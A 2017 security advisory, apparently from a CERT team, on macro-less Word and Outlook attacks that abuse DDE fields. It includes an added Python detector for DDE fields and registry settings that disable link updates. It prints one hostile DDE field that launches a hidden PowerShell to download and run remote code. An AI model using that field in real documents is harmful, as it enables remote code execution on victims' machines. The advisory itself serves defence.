CSP-CERT® Security Advisory:
New Attack in Word and Outlook, No Need for Macros

by CSP-CERT® Research Science
posted October 2017

There is a new wave of malicious documents circulating in the wild these days.

The attack comes in the form of malicious Word documents (.docx files) that abuse the DDE (Dynamic Data Exchange) feature of MS Word to execute code automatically when the document is opened.

The Bad:

Unlike earlier generations of malicious documents, this attack does not need macros to execute. All the attacker has to do is modify a DDE field and place the malicious command inside it.

Example:

DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('http://');powershell -e $e "

The field code above launches cmd.exe, which starts PowerShell; PowerShell then downloads whatever the URL serves and executes it.

Most of the attacks we have seen are variations on the code above. What is worse is that, because of the nature of DDE, the technique is not limited to MS Word documents: it also works from the body of an email itself, taking the attachment out of the equation altogether.

Reports have also come in that it works in OneNote and in Outlook calendar invites.

Because this is not strictly a vulnerability but a feature being abused (much like macros), no patch appears to be coming in the foreseeable future.
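As an added example (not part of the original advisory), the Python script below scans a .docx for the artefact this attack relies on: a field whose instruction starts with DDE or DDEAUTO. It inspects every XML part under word/ (body, headers, footers, footnotes), and reassembles field instructions that Word splits across several w:instrText runs, so a field hidden in a header or broken up over runs is still caught. The sample document it builds is constructed inline, and its cmd.exe argument is a harmless placeholder, not the payload from the advisory.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"

def field_instructions(xml_bytes):
    """Yield each field instruction in a WordprocessingML part: w:fldSimple/@w:instr, plus
    the w:instrText runs between begin/end w:fldChar marks (Word splits them) joined."""
    root = ET.fromstring(xml_bytes)
    for fld in root.iter(W + "fldSimple"):
        yield fld.get(W + "instr", "")
    buf, depth = [], 0  # depth > 0 while inside a complex (possibly nested) field
    for el in root.iter():
        if el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                depth += 1
            elif kind == "end" and depth:
                depth -= 1
            if depth == 0 and buf:  # outermost field closed: emit its flattened text
                yield "".join(buf)
                buf = []
        elif el.tag == W + "instrText" and depth:
            buf.append(el.text or "")

def find_dde_fields(docx_bytes):
    """Return (part name, whitespace-normalised instruction) for every DDE/DDEAUTO field."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if name.startswith("word/") and name.endswith(".xml"):  # body, headers, footers, ...
                for instr in field_instructions(zf.read(name)):
                    toks = instr.split()
                    if toks and toks[0].upper() in ("DDE", "DDEAUTO"):
                        hits.append((name, " ".join(toks)))
    return hits

def build_sample_docx():
    """Constructed test file (not a real sample): a DDEAUTO field split over two runs, then a DATE field."""
    body = ('<w:document xmlns:w="%s"><w:body><w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>'
            '<w:r><w:instrText>DDEAUTO c:\\\\windows\\\\system32\\\\cmd.exe </w:instrText></w:r>'
            '<w:r><w:instrText>"/k echo constructed-sample"</w:instrText></w:r>'
            '<w:r><w:fldChar w:fldCharType="separate"/></w:r><w:r><w:t>x</w:t></w:r>'
            '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p><w:p><w:fldSimple w:instr=" DATE ">'
            '<w:r><w:t>x</w:t></w:r></w:fldSimple></w:p></w:body></w:document>' % W[1:-1])
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w") as zf:
        zf.writestr("word/document.xml", body)
    return out.getvalue()
```

Run find_dde_fields() over a real attachment's bytes to list each offending part and the reassembled field code; the benign DATE field in the sample is deliberately not reported.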

The Good:

The good news is that, because of how the attack is structured, there are warning signs, two in fact, that serve as red flags for the security conscious. They come in the form of message boxes that should raise alarms for the user.

Upon opening a document or an email carrying this kind of attack, the message box shown below pops up.


If you click Yes, the document continues to load and then shows the pop-up below.


If the first message box didn't trip any warning bells, the second should!

If the user clicks Yes on this one as well, the malicious code executes.

Clicking No on either message box stops the threat in its tracks.

Furthermore, it is advisable to create the registry values below to close this avenue of attack altogether. With these values set, the user never sees a message box: Word says no from the start and the attack does not work.

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options]

"DontUpdateLinks"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options\WordMail]

"DontUpdateLinks"=dword:00000001

The GitHub link below covers more versions of Office.


These settings can then be packaged as a GPO in a domain environment and deployed across the enterprise.